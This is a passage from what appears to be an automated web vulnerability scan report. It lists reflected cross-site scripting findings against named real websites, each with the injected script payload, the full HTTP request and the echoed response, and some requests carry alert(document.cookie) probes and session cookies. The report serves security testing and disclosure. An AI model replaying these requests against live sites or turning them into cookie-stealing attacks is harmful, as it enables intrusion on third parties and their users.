rsi_us_1000000=pUMd5U+DfxIU7WwyrNQb2zsSFn/hJiW258mwCPCWmcgin7Ykjm72mb7cpStB8YF3kI7TO6x7AobBweYSl9GZ0nXyMV0lFSlMa1jHrq+n9QT6FijETfViMfJgDyuBz0n8Hk28yO5p/fRuPzGtQPRkyu5Bc6axhObjT2cysIx+D4/NrHkSZpo4vk8w5l61U5SqdOiUvEeCZ5WrSLwN+Xq5aEPZSO2oX3vsODweKrIMy8p+ldR7d76u4sEt6RgWsfSNxtXQ1lt23lO4GrGh25UY7nMoVnrr5iAvFRtg24ViPVDowzcxt8eRODdcZiwbVc2np3WjZtoAJ1aO71nPtckWRa8VCRDcVPa+cMxvGtmbDEBHIOMyi8IUEWK0av0+4ojr1uh/umPt1bAaq4aUO4z8oENY7vBTaZSyETfDH8dVtshVbMqgt6mXZyMdxxn2bQSZVCIbYsSr7E1B995sZq2f+pJ2+M8K7OUr/r3a9SLKcxQ+lAR8cX83159adv1KgRuaALpGKRFQDil4cYbegCYXB33l6nFeV9R2FwBG2izy3Gm5I+NoOBfFFGboa7p0gM1gg8TrrRL1LoRP21v8OErLvjC/xINg6T9J1c15UckQKoakfMW6lVoLFukvaGPQXMQt3IlOXJncY9VGQY3BI0ThPnKoHx//VhhBBOENVxJVlKoRta67M24YVtuqylurRv9JKzlEWoYz0la7gmQzl6pSfsGHo6jvv6og5GuUjBC/UfRyPmP2YD/Z6MLNJ5s1pn32pCXBNuGqM/MWn0ix3FgHGlWpSEpv7Ru3AkJmVgjGyeuRwLBzeHzpYe8hv8Y=; rsi_segs_1000000=pUPFfUnF7gMUVVNGyQq6Tc2UE03EygBbRXVdvuFY1BA6MUfyIuV86Lli0TAjp7vTbarnvaHN9T2ow1lTs80IFRatyDifWyk9mf1Kh7aRP1Ys1ciYX3r+3g5rrIF04H4FAiutUjgMss6NEqGMIeSYHxakEN/DRePx1bwHrbhXzJD91WqT8N1pQYXg+GpVj1vtVjK1+AiwL4ScNYq0oKT0cw==; NETSEGS_J08778=0105974ea67d21e1&J08778&0&4d5ae6ff&0&&4d350f93&4c5cffb70704da9ab1f721e8ae18383d; rtc_0=MLuBa40HAV7DEFZEdMKVl168Ne30F2LgIMllRLOj2CnyxLwSlYtMGPNUFv6UJ75S23vXs9VpSODtSfbRXbKeKsIfm/9vVCVRHq5E9dPOyJm5LyxhQ0JLpdlLRkRi1AuT5G8QYh4GpDTxObx7HqsmwclpQmx8PITjRXvTVnlGDfiP+KG3TuYhIgfdoMdRUNcxsYfj/XLnOWpzH6FblA==

Response

HTTP/1.1 200 OK
Server: Apache-Coyote/1.1
Last-Modified: Wed, 19 Jan 2011 18:01:06 GMT
Cache-Control: max-age=86400, private
Expires: Thu, 20 Jan 2011 18:01:06 GMT
Content-Type: application/javascript;charset=ISO-8859-1
Date: Wed, 19 Jan 2011 18:01:05 GMT
Content-Length: 128

/*
* JavaScript include error:
* The customer code "K08784A088D<SCRIPT>ALERT(1)</SCRIPT>E11CD877BB9" was not recognized.
*/

4.38. http://landesm.gfi.com/event-log-analysis-sm/ [REST URL parameter 1]  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   http://landesm.gfi.com
Path:   /event-log-analysis-sm/

Issue detail

The value of REST URL parameter 1 is copied into a JavaScript string which is encapsulated in single quotation marks. The payload ed76e'-alert(1)-'ef86bc64d25 was submitted in the REST URL parameter 1. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Remediation detail

Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.

Request

GET /event-log-analysis-smed76e'-alert(1)-'ef86bc64d25/ HTTP/1.1
Host: landesm.gfi.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response

HTTP/1.1 404 Not Found
Content-Type: text/html; charset=UTF-8
Date: Wed, 19 Jan 2011 18:09:18 GMT
Server: TornadoServer/1.0
Content-Length: 2205
Connection: Close

<!DOCTYPE html>
<html>
<head>
<meta http-equiv="Content-Type" content="text/html; charset=utf-8" />
<title>Oops (Error 404) - Performable</title>
<style type="text/css">
body {
font-family:"Lucida Gra
...[SNIP]...
<script type="text/javascript">
var _gaq = _gaq || [];
_gaq.push(['_setAccount', 'UA-10161796-3']);
_gaq.push(['_trackPageview', '/errors/landesm.gfi.com/404/event-log-analysis-smed76e'-alert(1)-'ef86bc64d25/']);
(function() {
var ga = document.createElement('script'); ga.type = 'text/javascript'; ga.async = true;
ga.src = ('https:' == document.location.protocol ? 'https://ssl' : 'http://www') + '.google-
...[SNIP]...

4.39. http://rafael.adm.br/ [name of an arbitrarily supplied request parameter]  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   http://rafael.adm.br
Path:   /

Issue detail

The name of an arbitrarily supplied request parameter is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload ffb7d"><script>alert(1)</script>21b58676d82 was submitted in the name of an arbitrarily supplied request parameter. This input was echoed as ffb7d\\\"><script>alert(1)</script>21b58676d82 in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /?ffb7d"><script>alert(1)</script>21b58676d82=1 HTTP/1.1
Host: rafael.adm.br
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response

HTTP/1.1 200 OK
Server: nginx/0.7.62
Date: Wed, 19 Jan 2011 16:58:42 GMT
Content-Type: text/html; charset=UTF-8
Connection: close
X-Powered-By: PHP/5.2.10-2ubuntu6
Vary: Cookie
X-Pingback: http://rafael.adm.br/xmlrpc.php
Content-Length: 43014

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml">
<head profile="http://gmpg.org/x
...[SNIP]...
<a href="http://rafael.adm.br/page/2/?ffb7d\\\"><script>alert(1)</script>21b58676d82=1">
...[SNIP]...

4.40. http://skaddenpractices.skadden.com/fca/ [name of an arbitrarily supplied request parameter]  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   http://skaddenpractices.skadden.com
Path:   /fca/

Issue detail

The name of an arbitrarily supplied request parameter is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload 6f2fa"><script>alert(1)</script>7a7277b34d3 was submitted in the name of an arbitrarily supplied request parameter. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /fca/?6f2fa"><script>alert(1)</script>7a7277b34d3=1 HTTP/1.1
Host: skaddenpractices.skadden.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response

HTTP/1.1 200 OK
Date: Wed, 19 Jan 2011 18:14:42 GMT
Server: Apache/2.2.8 (Unix) mod_ssl/2.2.8 OpenSSL/0.9.8b PHP/5.2.5
Set-Cookie: Apache=173.193.214.243.1295460882218266; path=/
X-Powered-By: PHP/5.2.5
Set-Cookie: FRONTSKADDEN=f642355c896d83fe703b92dbf7d4cbd0; path=/
Expires: Thu, 19 Nov 1981 08:52:00 GMT
Cache-Control: no-store, no-cache, must-revalidate, post-check=0, pre-check=0
Pragma: no-cache
Connection: close
Content-Type: text/html
Content-Length: 26018


<!-- DW6 -->
<head>
<meta http-equiv="Content-Type" content="text/html; charset=iso-8859-1">

<title>Skadden - False Claims Act Defense</title>

<link href="scripts/skadden_mini.css" rel="stylesheet
...[SNIP]...
<a href="/fca/index.php?6f2fa"><script>alert(1)</script>7a7277b34d3=1&print=1" target="_blank" onmouseover="tprint.src='images/t-print2.gif';toolbox.src='images/sh-print.gif'" onmouseout="tprint.src='images/t-print1.gif';toolbox.src='images/sh-tools.gif'">
...[SNIP]...

4.41. http://skaddenpractices.skadden.com/hc/ [name of an arbitrarily supplied request parameter]  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   http://skaddenpractices.skadden.com
Path:   /hc/

Issue detail

The name of an arbitrarily supplied request parameter is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload b6d57"><script>alert(1)</script>5968cea9b03 was submitted in the name of an arbitrarily supplied request parameter. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /hc/?b6d57"><script>alert(1)</script>5968cea9b03=1 HTTP/1.1
Host: skaddenpractices.skadden.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response

HTTP/1.1 200 OK
Date: Wed, 19 Jan 2011 18:14:47 GMT
Server: Apache/2.2.8 (Unix) mod_ssl/2.2.8 OpenSSL/0.9.8b PHP/5.2.5
Set-Cookie: Apache=173.193.214.243.1295460887085136; path=/
X-Powered-By: PHP/5.2.5
Set-Cookie: FRONTSKADDENHC=81465b85641fb95bc04d846351eba1e0; path=/
Expires: Thu, 19 Nov 1981 08:52:00 GMT
Cache-Control: no-store, no-cache, must-revalidate, post-check=0, pre-check=0
Pragma: no-cache
Connection: close
Content-Type: text/html
Content-Length: 40019


<!-- DW6 -->
<head>
<meta http-equiv="Content-Type" content="text/html; charset=iso-8859-1">

<title>Skadden - Health Care</title>

<link href="scripts/skadden_mini.css" rel="stylesheet" type="text/
...[SNIP]...
<a href="/hc/index.php?b6d57"><script>alert(1)</script>5968cea9b03=1&print=1" target="_blank" onmouseover="tprint.src='images/t-print2.gif';toolbox.src='images/sh-print.gif'" onmouseout="tprint.src='images/t-print1.gif';toolbox.src='images/sh-tools.gif'">
...[SNIP]...

4.42. http://skaddenpractices.skadden.com/sec/ [name of an arbitrarily supplied request parameter]  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   http://skaddenpractices.skadden.com
Path:   /sec/

Issue detail

The name of an arbitrarily supplied request parameter is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload 81116"><script>alert(1)</script>ab7d185670b was submitted in the name of an arbitrarily supplied request parameter. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /sec/?81116"><script>alert(1)</script>ab7d185670b=1 HTTP/1.1
Host: skaddenpractices.skadden.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response

HTTP/1.1 200 OK
Date: Wed, 19 Jan 2011 18:14:43 GMT
Server: Apache/2.2.8 (Unix) mod_ssl/2.2.8 OpenSSL/0.9.8b PHP/5.2.5
Set-Cookie: Apache=173.193.214.243.1295460883243148; path=/
X-Powered-By: PHP/5.2.5
Set-Cookie: FRONTSKADDENSEC=93a86fa73ffca397505be2273bb8a129; path=/
Expires: Thu, 19 Nov 1981 08:52:00 GMT
Cache-Control: no-store, no-cache, must-revalidate, post-check=0, pre-check=0
Pragma: no-cache
Connection: close
Content-Type: text/html
Content-Length: 21654


<!-- DW6 -->
<head>
<meta http-equiv="Content-Type" content="text/html; charset=iso-8859-1">

<title>Skadden - SEC Enforcement and Compliance</title>

<link href="scripts/skadden_mini.css" rel="styl
...[SNIP]...
<iframe src="/sec/index.php?81116"><script>alert(1)</script>ab7d185670b=1&attorneys=1&inline=1" frameborder="0" scrolling="auto" name="primarycontact" allowtransparency="true" background-color="transparent">
...[SNIP]...

4.43. http://skaddenpractices.skadden.com/sec/ [name of an arbitrarily supplied request parameter]  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   http://skaddenpractices.skadden.com
Path:   /sec/

Issue detail

The name of an arbitrarily supplied request parameter is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload 7ae3b"><script>alert(1)</script>cc7c0c0318c was submitted in the name of an arbitrarily supplied request parameter. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /sec/?7ae3b"><script>alert(1)</script>cc7c0c0318c=1 HTTP/1.1
Host: skaddenpractices.skadden.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response

HTTP/1.1 200 OK
Date: Wed, 19 Jan 2011 18:14:42 GMT
Server: Apache/2.2.8 (Unix) mod_ssl/2.2.8 OpenSSL/0.9.8b PHP/5.2.5
Set-Cookie: Apache=173.193.214.243.1295460882882759; path=/
X-Powered-By: PHP/5.2.5
Set-Cookie: FRONTSKADDENSEC=31dc20249a9ecac44a1bd41ef91f6911; path=/
Expires: Thu, 19 Nov 1981 08:52:00 GMT
Cache-Control: no-store, no-cache, must-revalidate, post-check=0, pre-check=0
Pragma: no-cache
Connection: close
Content-Type: text/html
Content-Length: 21654


<!-- DW6 -->
<head>
<meta http-equiv="Content-Type" content="text/html; charset=iso-8859-1">

<title>Skadden - SEC Enforcement and Compliance</title>

<link href="scripts/skadden_mini.css" rel="styl
...[SNIP]...
<a href="/sec/index.php?7ae3b"><script>alert(1)</script>cc7c0c0318c=1&print=1" target="_blank" onmouseover="tprint.src='images/t-print2.gif';toolbox.src='images/sh-print.gif'" onmouseout="tprint.src='images/t-print1.gif';toolbox.src='images/sh-tools.gif'">
...[SNIP]...

4.44. http://twittercounter.com/embed/ [username parameter]  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   http://twittercounter.com
Path:   /embed/

Issue detail

The value of the username request parameter is copied into a JavaScript string which is encapsulated in single quotation marks. The payload fe165'%3balert(1)//8402f0b736c was submitted in the username parameter. This input was echoed as fe165';alert(1)//8402f0b736c in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Remediation detail

Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.

Request

GET /embed/?username=rafaelpfe165'%3balert(1)//8402f0b736c HTTP/1.1
Host: twittercounter.com
Proxy-Connection: keep-alive
Referer: http://rafael.adm.br/?ffb7d%22%3E%3Cscript%3Ealert(document.cookie)%3C/script%3E21b58676d82=1
Accept: */*
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.10 (KHTML, like Gecko) Chrome/8.0.552.237 Safari/534.10
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3

Response

HTTP/1.1 200 OK
Date: Wed, 19 Jan 2011 18:03:39 GMT
Server: Apache/2.2.14 (Fedora) PHP/5.3.2
X-Powered-By: PHP/5.3.2
Expires: Sat, 29 Jan 2011 18:03:39 GMT
Vary: Accept-Encoding
Connection: close
Content-Type: text/html; charset=UTF-8
Content-Length: 448

       <!--
       document.write( '<div id="TwitterCounter"><a href="http://twittercounter.com/rafaelpfe165';alert(1)//8402f0b736c" title="TwitterCounter for @rafaelpfe165';alert(1)//8402f0b736c" target="_blank">
...[SNIP]...

4.45. http://web2.domainmall.com/domainserve/domainView [dn parameter]  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   http://web2.domainmall.com
Path:   /domainserve/domainView

Issue detail

The value of the dn request parameter is copied into a JavaScript inline comment. The payload e35b9*/alert(1)//6ec7245ba5b was submitted in the dn parameter. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Remediation detail

Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.

Request

GET /domainserve/domainView?dn=e35b9*/alert(1)//6ec7245ba5b HTTP/1.1
Host: web2.domainmall.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response

HTTP/1.1 200 OK
Date: Wed, 19 Jan 2011 18:15:51 GMT
Server: Apache/2.0.63 (Unix) PHP/5.2.10 mod_perl/2.0.4 Perl/v5.8.8
Vary: Accept-Language
Set-Cookie: hosting_session=44629bb917943f5c30c4192d9464a313dab56ab4; path=/; expires=Wed, 19-Jan-2011 19:15:51 GMT
Content-Length: 31997
Connection: close
Content-Type: text/html; charset=utf-8


<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml">
<head>
<script type="text/java
...[SNIP]...
rn result[1];
}

function redirect() {

window.location = "http://www.google.com";
}

// channel: "sports",


/*var google_afd_request = {

client: "ca-dp-sphere_related_xml",
domain_name: "e35b9*/alert(1)//6ec7245ba5b.e35b9*/alert(1)//6ec7245ba5b",
s: "e35b9*/alert(1)//6ec7245ba5b.e35b9*/alert(1)//6ec7245ba5b",
hl: "en"
}*/


var google_afd_request = {
client: 'ca-dp-sphere_related_xml',
domain_name: "e35
...[SNIP]...

4.46. http://web2.domainmall.com/domainserve/domainView [dn parameter]  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   http://web2.domainmall.com
Path:   /domainserve/domainView

Issue detail

The value of the dn request parameter is copied into a JavaScript string which is encapsulated in double quotation marks. The payload f37b7"%3balert(1)//97f91a6f73c was submitted in the dn parameter. This input was echoed as f37b7";alert(1)//97f91a6f73c in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Remediation detail

Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.

Request

GET /domainserve/domainView?dn=f37b7"%3balert(1)//97f91a6f73c HTTP/1.1
Host: web2.domainmall.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response

HTTP/1.1 200 OK
Date: Wed, 19 Jan 2011 18:15:36 GMT
Server: Apache/2.0.63 (Unix) PHP/5.2.10 mod_perl/2.0.4 Perl/v5.8.8
Vary: Accept-Language
Set-Cookie: hosting_session=c0caa9ec1522c80f906fc7eb2fe5b51232878fd2; path=/; expires=Wed, 19-Jan-2011 19:15:36 GMT
Content-Length: 31997
Connection: close
Content-Type: text/html; charset=utf-8


<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml">
<head>
<script type="text/java
...[SNIP]...
nction also_click()
{

var success = function(){};
var failure = function(){};
var callback = {success:success,failure:failure};

var url = "/domainserve/domainClick?viewid=557127573&searchid=&dn=f37b7";alert(1)//97f91a6f73c.f37b7";alert(1)//97f91a6f73c&ajax=1";
var request = YAHOO.util.Connect.asyncRequest("GET", url, callback);
setTimeout(function(){},100);

}

function blocked(status)
{
var success = function(){};
...[SNIP]...

4.47. http://web2.domainmall.com/domainserve/domainView [dn parameter]  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   http://web2.domainmall.com
Path:   /domainserve/domainView

Issue detail

The value of the dn request parameter is copied into the HTML document as text between TITLE tags. The payload 6c6ee</title><script>alert(1)</script>4caa1df9615 was submitted in the dn parameter. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /domainserve/domainView?dn=6c6ee</title><script>alert(1)</script>4caa1df9615 HTTP/1.1
Host: web2.domainmall.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response

HTTP/1.1 200 OK
Date: Wed, 19 Jan 2011 18:15:47 GMT
Server: Apache/2.0.63 (Unix) PHP/5.2.10 mod_perl/2.0.4 Perl/v5.8.8
Vary: Accept-Language
Set-Cookie: hosting_session=7b4e1c0a481e6b51a8e8953417964887f5cf6ab1; path=/; expires=Wed, 19-Jan-2011 19:15:47 GMT
Content-Length: 33089
Connection: close
Content-Type: text/html; charset=utf-8


<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml">
<head>
<script type="text/java
...[SNIP]...
<title>6c6ee</title><script>alert(1)</script>4caa1df9615.6c6ee</title>
...[SNIP]...

4.48. http://web2.domainmall.com/domainserve/domainView [dn parameter]  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   http://web2.domainmall.com
Path:   /domainserve/domainView

Issue detail

The value of the dn request parameter is copied into a JavaScript string which is encapsulated in single quotation marks. The payload 58025'%3balert(1)//1b423bdb38b was submitted in the dn parameter. This input was echoed as 58025';alert(1)//1b423bdb38b in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Remediation detail

Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.

Request

GET /domainserve/domainView?dn=58025'%3balert(1)//1b423bdb38b HTTP/1.1
Host: web2.domainmall.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response

HTTP/1.1 200 OK
Date: Wed, 19 Jan 2011 18:15:39 GMT
Server: Apache/2.0.63 (Unix) PHP/5.2.10 mod_perl/2.0.4 Perl/v5.8.8
Vary: Accept-Language
Set-Cookie: hosting_session=020ac9983d95161f0d76c3fd16fc5b5fd4847907; path=/; expires=Wed, 19-Jan-2011 19:15:39 GMT
Content-Length: 31997
Connection: close
Content-Type: text/html; charset=utf-8


<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml">
<head>
<script type="text/javascript">
var mobile_redirect_url = 'http://58025';alert(1)//1b423bdb38b.58025';alert(1)//1b423bdb38b/domainserve/domainView?dn=58025';alert(1)//1b423bdb38b.58025';alert(1)//1b423bdb38b&mobile=1';

if(undefined != mobile_redirect_url && navigator.userAgent.match(/(ip
...[SNIP]...

4.49. http://web2.domainmall.com/domainserve/domainView [dn parameter]  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   http://web2.domainmall.com
Path:   /domainserve/domainView

Issue detail

The value of the dn request parameter is copied into the HTML document as plain text between tags. The payload 778ef<script>alert(1)</script>584f04eb84a was submitted in the dn parameter. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /domainserve/domainView?dn=778ef<script>alert(1)</script>584f04eb84a HTTP/1.1
Host: web2.domainmall.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response

HTTP/1.1 200 OK
Date: Wed, 19 Jan 2011 18:15:42 GMT
Server: Apache/2.0.63 (Unix) PHP/5.2.10 mod_perl/2.0.4 Perl/v5.8.8
Vary: Accept-Language
Set-Cookie: hosting_session=87c366042c8466e1129e73c4d834367a5e54d93a; path=/; expires=Wed, 19-Jan-2011 19:15:42 GMT
Content-Length: 32673
Connection: close
Content-Type: text/html; charset=utf-8


<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml">
<head>
<script type="text/java
...[SNIP]...
</script>584f04eb84a.778ef<script>alert(1)</script>584f04eb84a/domainserve/domainView?dn=778ef<script>
...[SNIP]...

4.50. http://web2.domainmall.com/domainserve/domainView [dn parameter]  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   http://web2.domainmall.com
Path:   /domainserve/domainView

Issue detail

The value of the dn request parameter is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload 9eec5"><script>alert(1)</script>da4345821a9 was submitted in the dn parameter. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /domainserve/domainView?dn=9eec5"><script>alert(1)</script>da4345821a9 HTTP/1.1
Host: web2.domainmall.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response

HTTP/1.1 200 OK
Date: Wed, 19 Jan 2011 18:15:30 GMT
Server: Apache/2.0.63 (Unix) PHP/5.2.10 mod_perl/2.0.4 Perl/v5.8.8
Vary: Accept-Language
Set-Cookie: hosting_session=bf9ad0a13d12e1c13476be8aa19fd921a11c014d; path=/; expires=Wed, 19-Jan-2011 19:15:30 GMT
Content-Length: 32777
Connection: close
Content-Type: text/html; charset=utf-8


<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml">
<head>
<script type="text/java
...[SNIP]...
<meta name="description" content="Look no further for the best information on 9eec5"><script>alert(1)</script>da4345821a9.9eec5">
...[SNIP]...

4.51. http://web2.domainmall.com/domainserve/domainView [dn parameter]  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   http://web2.domainmall.com
Path:   /domainserve/domainView

Issue detail

The value of the dn request parameter is copied into the value of an HTML tag attribute which is encapsulated in single quotation marks. The payload c682d'><script>alert(1)</script>0eba87e9935 was submitted in the dn parameter. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /domainserve/domainView?dn=c682d'><script>alert(1)</script>0eba87e9935 HTTP/1.1
Host: web2.domainmall.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response

HTTP/1.1 200 OK
Date: Wed, 19 Jan 2011 18:15:33 GMT
Server: Apache/2.0.63 (Unix) PHP/5.2.10 mod_perl/2.0.4 Perl/v5.8.8
Vary: Accept-Language
Set-Cookie: hosting_session=19e337cb57bdd20b143e8c174e2bbda30121583e; path=/; expires=Wed, 19-Jan-2011 19:15:33 GMT
Content-Length: 32777
Connection: close
Content-Type: text/html; charset=utf-8


<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml">
<head>
<script type="text/java
...[SNIP]...
<INPUT TYPE=HIDDEN NAME='dn' VALUE='c682d'><script>alert(1)</script>0eba87e9935.c682d'>
...[SNIP]...

4.52. http://wsdsapi.infospace.com/infomaster/widgets [qkwid1 parameter]  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   http://wsdsapi.infospace.com
Path:   /infomaster/widgets

Issue detail

The value of the qkwid1 request parameter is copied into a JavaScript string which is encapsulated in single quotation marks. The payload 9ce31'%3balert(1)//60c9f7c43e2 was submitted in the qkwid1 parameter. This input was echoed as 9ce31';alert(1)//60c9f7c43e2 in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Remediation detail

Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.

Request

GET /infomaster/widgets?wid=pt&qkwid1=qkw9ce31'%3balert(1)//60c9f7c43e2&submitid1=sqkw HTTP/1.1
Host: wsdsapi.infospace.com
Proxy-Connection: keep-alive
Referer: http://www.info.com/washington%20dc%20law%20firms2ee2d%253cscript%253ealert%2528document.cookie%2529%253c%252fscript%253e72356283334
Accept: */*
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.10 (KHTML, like Gecko) Chrome/8.0.552.237 Safari/534.10
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3

Response

HTTP/1.1 200 OK
Connection: close
Date: Wed, 19 Jan 2011 18:05:10 GMT
Server: Microsoft-IIS/6.0
X-Powered-By: ASP.NET
X-AspNet-Version: 2.0.50727
Set-Cookie: .ASPXANONYMOUS=JKxkv-1aEVJK8TrSC4zgrQyPUpVDdgrvFeBW_v_PrzKceW2yOCkLgBgwdHFbvPr5OpaQtvJ8YPTHfWwl4GWV3GhNrCJKk3Nl0myqcNWKrXVq5G5_rodzQnjJpPDrhKsD-0vXup1i6MsTcSZ86sm0EOic86poPiPwQoyKxoESCLH3ieUQ0; expires=Fri, 14-Dec-2012 04:45:10 GMT; path=/
Set-Cookie: ASP.NET_SessionId=33jktje1lyprzd454fe1zryz; path=/
Set-Cookie: DomainSession=TransactionId=1fc361942a8747448838c7deaeb7cb01&SessionId=ffd2a4e5c674424ba5e0c7deaeb7cb01&ActionId=2859ad8491b34b9aa416c7deaeb7cb01&CookieDomain=.infospace.com; domain=.infospace.com; expires=Wed, 19-Jan-2011 18:25:10 GMT; path=/
Set-Cookie: DomainUserProfile=AnonymousId=fb3233944f2346679663c7deaeb7cb01&LastSeenDateTime=1/19/2011 6:05:10 PM&IssueDateTime=1/19/2011 6:05:10 PM&CookieDomain=.infospace.com; domain=.infospace.com; expires=Fri, 26-Dec-2110 18:05:10 GMT; path=/
Cache-Control: public
Expires: Wed, 19 Jan 2011 19:05:10 GMT
Content-Type: text/html; charset=utf-8
Vary: Accept-Encoding, User-Agent


                                   // variable contructors
var txtElements = [{txt:'qkw9ce31';alert(1)//60c9f7c43e2',btn:'sqkw'}];var rfcIDElements = [];

// Disable autocomplete
var input1 = document.getElementById('qkw9ce31';alert(1)//60c9f7c43e2');input1.setAttribute('autocomplete','off');

function JSONscr
